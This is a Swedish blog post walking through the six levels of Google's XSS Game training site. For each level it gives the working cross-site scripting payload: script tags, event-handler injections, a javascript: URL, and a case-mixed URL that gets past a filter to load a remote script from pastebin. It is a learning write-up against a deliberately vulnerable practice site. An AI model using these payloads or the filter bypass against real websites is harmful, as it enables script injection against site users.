XSS 2 – Google XSS Game

https://xss-game.appspot.com/level5

Level 1
Här är level 1: https://xss-game.appspot.com/level1

Ja här var det ju inga konstigheter. En uppvärmningsnivå.
I sökfältet kör man:

<script>alert("xss");</script>

Level 2
Som vi kan se i det första inlägget. Det första kommentaren, så går det alltså att posta html i kommentarerna. Men script verkar vara filtrerat.
Så istället injectar vi en funktion i bilden.

<img src="#" onclick="alert(3);">

Level 3
Nu har det blivit lite svårare.
Vi kan alltså notera att när man klickar på en flik så kallar vi på funktionen onclick(chooseTab(“3)). Om vi sedan kollar i den funktionen så ser vi att den hämtar ett nummer från adressfältet, med hjälp av dom-objektet window.location.hash. Hash representerar är # som finns i adressen. Detta innebär att vi kan injecta javascript direkt i adressfältet. Det som skrivs i adressfältet skickas sedan till en bildadress för att visa upp rätt bild.
Därför behöver vi bara injecta följande:

https://xss-game.appspot.com/level3/frame#2' onclick="alert(2)"

Efter #2 så avslutar vi attributet med ett ‘. Sen lägger vi till vår egen kod.

Level 4
Den här var mycket svårare än de tidigare.
Där behövde vi först avsluta tidigare kommando, men för att det skulle funka så behöver vi använda url-encoding. Dom finns här: http://www.w3schools.com/tags/ref_urlencode.asp

https://xss-game.appspot.com/level4/frame/?timer=')%3Bonload="alert(3)"://

Level 5
Så I den här leveln så lär mig sig att det finns ett annat sätt att injecta javascript. Det är att injecta det i länkadresser.

<a href="javascript:alert(2)">länk</a>

Så det är principen för den här leveln.

https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(2)

Level 6
Den här nivån var lite svårare än de tidigare.
Här behöver man själv skapa en fil som ska executas. Så jag skapade filen i pastebin.
Det finns en regex som filterar ut http. Så att man inte kan skicka in externa skript. Men regexen är inte case-sensitive. Vilket gör att man helt enkelt bara kan skriva det med stora bokstäver.

https://xss-game.appspot.com/level6/frame#hTTpS://pastebin.com/raw.php?i=xRxAiEVU
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s